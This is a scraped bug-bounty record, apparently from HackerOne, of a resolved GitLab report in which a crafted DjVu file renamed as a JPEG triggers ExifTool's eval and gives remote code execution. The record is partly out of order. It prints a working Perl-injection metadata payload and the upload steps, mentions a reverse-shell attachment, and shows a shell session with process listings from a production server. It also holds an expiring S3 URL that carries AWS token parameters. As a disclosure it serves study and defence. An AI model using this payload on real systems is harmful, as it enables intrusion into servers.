1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-14T20:30:46", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-14T20:30:46", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-14T20:30:46", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQRSHORSM3%2F20210514%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210514T203046Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGsaCXVzLXdlc3QtMiJHMEUCIQDVLnOayk4dnt2IQWgpV2ra5A7NUT5DlSpIaRczXO8ekQIgJwhRG7%2BwtCq4CWbpO58iJCNUxTHHr5eN%2BZLBBSbr12kqgwQI9P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARACGgwwMTM2MTkyNzQ4NDkiDIvaDkw5qXo%2BFanZLirXAyQndX5hMkHqWHLvEETYUkv%2BjPkz8R1lYZn3Ul8KRUA3%2BpaDX7txmDfw0gKBXLoAUtxY3GGR1YIlGqhiepRBDx4hQlsS3VNYndzSQYk6Ab3ua0VI8taYdSyi0Rzuysv7gXKCNdUFbShaDGygUCilBIX0r3a2BXxGW3ydxQmkWsugqYvvJl6z3EZn9g2CEQzqZlizBlHhKzRw4pitAhOaFRS6vcpNALzlnX7T2%2B%2FjwDwxDBm5dVkm0NXH6nhEc6GkZak6m%2BSZcG%2FHgEzJb4%2BOvDExSB%2F2URdmCjf%2Bq%2FDecht7jsMz1qA2rP9MeYipVX4riJE8BXEtknfiB7ZyqyqeKjpL4z%2BVolDmjGwOCurP250A4CM4FiwZXII3kDOQfItRH1Du392iyN86U0sTzsZEhEbzDEG5lkFCFXO0sPNk%2B1NjY98AtNSYxixzCHmd3laoOReBttcqSymknqmHClTIhXYHhDKm31rhpPg3ItHFla3adHUzj4JUuerbuBsa%2FKWo3B9tnnH4dmfPJOx3Rixa2fJs6ytZRABujza7shTZixISkuglUdfnRUx2yOELXeCxIy0jm%2Bq7BQOPFMpVw%2FVSPL3pFseFPyMVQPrroYOBJ1i7pxUgF2Gf1zDfkPuEBjqlAf%2Fub5xzQHgddpsMmVjM67O2YhOE81uejkG0dtNSM0UZ9vqrgxzvDfDpcrN6HI83d4TpagJFiR9ZmPz34zqm10nT3ls2kxRj3BwjgylUZXxwwyIwFfbR84%2Fwj3YX1k7j%2FYll%2FffBkPMXKb2AUeG8TJWYksMQWXuigPtleT9P0WHzEcBi7Ys%2FTHWcfllJPbJQdvepKu%2Brg915L5a39b2%2BOgSkKze5Lw%3D%3D&X-Amz-Signature=7949435ce513428c4923019765c04bbaf6a4dd7618df4e843b5e4cd41638a994"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-14T20:30:46", "differentElements": ["h1reporter"], "edition": 1}, {"bulletin": {"id": "H1:1154542", "hash": "a2968fe633f90a8a1c53ceb4ea17742f", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 